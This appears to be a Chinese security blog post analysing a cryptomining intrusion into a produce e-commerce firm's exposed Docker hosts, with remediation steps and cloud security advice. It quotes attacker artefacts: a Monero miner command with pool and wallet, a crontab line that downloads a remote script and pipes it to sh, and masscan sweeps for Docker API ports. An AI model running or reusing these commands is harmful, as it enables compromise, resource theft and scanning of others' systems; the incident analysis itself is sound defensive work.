[[383510]]

0x00、前言

繼快遞、外賣之后，互聯(lián)網(wǎng)買菜也成為一種時(shí)尚。這背后是成長迅速的新零售生鮮行業(yè)，加之承載著非常高頻、重要的本地生活平臺(tái)入口功能，由此吸引著眾多互聯(lián)網(wǎng)巨頭。那么針對(duì)本次風(fēng)口，大公司有自己完善的安全治理解決方案，一般不會(huì)有重大的安全事件發(fā)生。但是針對(duì)一些中小公司來說，上線業(yè)務(wù)快(使用公有云)、沒有完善的前期業(yè)務(wù)安全規(guī)劃，安全運(yùn)營外包，設(shè)置核心業(yè)務(wù)和核心算法與大學(xué)合作外包。導(dǎo)致安全事件頻發(fā)，本文以一次某生鮮電商業(yè)務(wù)安全事件為切入點(diǎn)，討論一下快餐時(shí)代的安全運(yùn)營之道。

0x01、藥引子

@1、泛互聯(lián)網(wǎng)業(yè)務(wù)介紹

用戶業(yè)務(wù)系統(tǒng)規(guī)模大約40+臺(tái)服務(wù)器，包含：核心業(yè)務(wù)系統(tǒng)：云鮮集智能電商生態(tài)系統(tǒng)，客戶關(guān)系管理系統(tǒng);渠道端—營銷端—數(shù)據(jù)端全鏈數(shù)字化運(yùn)營體系：各種App渠道數(shù)據(jù)、第三方聊天記錄數(shù)據(jù)導(dǎo)入系統(tǒng)，算法平臺(tái)，自助式BI數(shù)據(jù)報(bào)表，輔助系統(tǒng)：服務(wù)器運(yùn)維監(jiān)控、監(jiān)理程序、安全服務(wù)等。

@2、安全問題發(fā)現(xiàn)階段

安全問題發(fā)現(xiàn)是從公有云平臺(tái)側(cè)發(fā)現(xiàn)的。在公有云外網(wǎng)出口Pop點(diǎn)IDS監(jiān)控?cái)?shù)據(jù)中發(fā)現(xiàn)該賬號(hào)下多臺(tái)主機(jī)出現(xiàn)對(duì)外DDoS攻擊，導(dǎo)致影響部署在同一物理機(jī)上其它云主機(jī)出現(xiàn)網(wǎng)絡(luò)數(shù)據(jù)丟包的現(xiàn)象，很不幸的是，這個(gè)被影響的用戶是游戲廠商，對(duì)網(wǎng)絡(luò)延時(shí)要求特別高，在網(wǎng)絡(luò)性能監(jiān)控系統(tǒng)中發(fā)現(xiàn)，延時(shí)增大影響業(yè)務(wù)。

@3、安全問題排查階段

網(wǎng)絡(luò)層面發(fā)現(xiàn)的安全問題需要到主機(jī)層面有相關(guān)的驗(yàn)證;主機(jī)層，需要安裝主機(jī)安全客戶端，否則無法感知到主機(jī)層的安全威脅，經(jīng)后臺(tái)查詢發(fā)現(xiàn)該租戶大部分云主機(jī)是沒有安裝公有云提供的默認(rèn)鏡像，導(dǎo)致沒有安裝云原生主機(jī)安全客戶端，聯(lián)系客戶運(yùn)維，在所有服務(wù)器上安裝主機(jī)安全客戶端，同時(shí)購買企業(yè)版。

安裝完成后，主機(jī)安全入侵檢測(cè)系統(tǒng)立刻發(fā)現(xiàn)海量的安全告警，告警類型包括：

【1】挖礦檢測(cè)：

/tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k –tls 

【2】病毒木馬：

/tmp/watchdog 

【3】敏感文件篡改：

發(fā)現(xiàn)crontab下設(shè)置

0 0 */3 * * /bin/sh –c wget –q -0 –  
http://195.xxx.xxx.118/spr.sh|sh >/dev/null 2>&1 

【4】資產(chǎn)指紋

同時(shí)登陸主機(jī)安全運(yùn)營界面，通過資產(chǎn)指紋功能查看發(fā)現(xiàn)：

運(yùn)行了大量對(duì)外掃描的進(jìn)程

masscan 126.0.0.0/8 -p2377 --rate=50000 
masscan 95.0.0.0/8 -p4243 --rate=50000 
masscan 225.0.0.0/8 -p4243 --rate=50000 
masscan 215.0.0.0/8 -p2376 --rate=50000 

同時(shí)發(fā)現(xiàn)大量容器接口對(duì)外監(jiān)聽，業(yè)務(wù)系統(tǒng)搭建比較隨意，很多系統(tǒng)都是通過docker方式搭建，直接把docker端口映射到外網(wǎng)。其中包括redis、mysql等敏感服務(wù)。

【5】容器運(yùn)行時(shí)安全

通過容器運(yùn)行時(shí)安全產(chǎn)品功能發(fā)現(xiàn)：

@4、業(yè)務(wù)止損

發(fā)現(xiàn)問題的主機(jī)正好是前面提到的核心業(yè)務(wù)系統(tǒng)主機(jī)，出現(xiàn)問題后平臺(tái)，直接下線其網(wǎng)絡(luò)權(quán)限，導(dǎo)致生鮮業(yè)務(wù)訂單系統(tǒng)無法正常運(yùn)行，已改成手工excel記賬的方式運(yùn)轉(zhuǎn)。所以，先做一下業(yè)務(wù)止損。

整體入侵流程：

1、暴力破解容器自帶mysql和redis，

2、成功獲取到數(shù)據(jù)庫權(quán)限后寫入下載惡意程序執(zhí)行腳本

3、執(zhí)行下惡意程序腳本

4、容器中部署挖礦程序

5、啟動(dòng)masscan掃描程序?qū)ν鈾M向攻擊

6、入侵宿主機(jī)部署挖礦程序和掃描程序。

整體止損流程：

•  清除crontab中加載的惡意腳本
• 殺掉進(jìn)程
•  刪除可疑進(jìn)程相關(guān)文件
• 把請(qǐng)求地址加入黑名單
•  提申請(qǐng)開放網(wǎng)絡(luò)權(quán)限

0x02、快餐時(shí)代的安全運(yùn)營

根據(jù)與安全托管運(yùn)營商溝通，發(fā)現(xiàn)這種泛互聯(lián)網(wǎng)企業(yè)其實(shí)是不愿意在安全方面投錢，運(yùn)營代理提供的安全建議也基本上認(rèn)為不重要，等安全事件發(fā)生影響到業(yè)務(wù)了才有所醒悟。

經(jīng)過多年的安全經(jīng)驗(yàn)積累，建議云上租戶做好以下幾點(diǎn)：

1、充分利用公有云IaaS產(chǎn)品原生安全屬性

•  VPC，不同的業(yè)務(wù)單元需要隔離。
•  安全組，針對(duì)主機(jī)對(duì)外開放端口要嚴(yán)格限制。
•  NATGateway，內(nèi)部主機(jī)要上網(wǎng)走NATGateway
•  云主機(jī)使用復(fù)雜密碼

2、適當(dāng)?shù)馁徺I核心的云原生安全產(chǎn)品

•  主機(jī)安全企業(yè)版

主機(jī)安全，是服務(wù)器貼身安全管家，通過資產(chǎn)管理、漏洞管理、基線檢查、入侵檢測(cè)、程序運(yùn)行認(rèn)證、文件完整性校驗(yàn)，安全運(yùn)營、網(wǎng)頁防篡改等功能，幫助企業(yè)更方便地管理主機(jī)安全風(fēng)險(xiǎn)，實(shí)時(shí)發(fā)現(xiàn)黑客入侵行為，以及滿足等保合規(guī)要求。

費(fèi)用：市面上價(jià)格一年1000元/臺(tái), 40臺(tái)大約4萬塊。當(dāng)然還有折扣。

•  云Web應(yīng)用防火墻

云Web應(yīng)用防火墻(云WAF)，云Web應(yīng)用防火墻WAF對(duì)網(wǎng)站業(yè)務(wù)流量進(jìn)行多維度檢測(cè)和防護(hù),結(jié)合深度機(jī)器學(xué)習(xí)智能識(shí)別惡意請(qǐng)求特征和防御未知威脅,全面避免網(wǎng)站被黑客惡意攻擊和入侵。

費(fèi)用：市面上價(jià)格一年4000元/10個(gè)域名, 4.8萬塊。當(dāng)然還有折扣。

3、提高安全意識(shí)

如果是代理運(yùn)營的話，給出的安全建議要足夠重視。

如若轉(zhuǎn)載，請(qǐng)注明原文地址。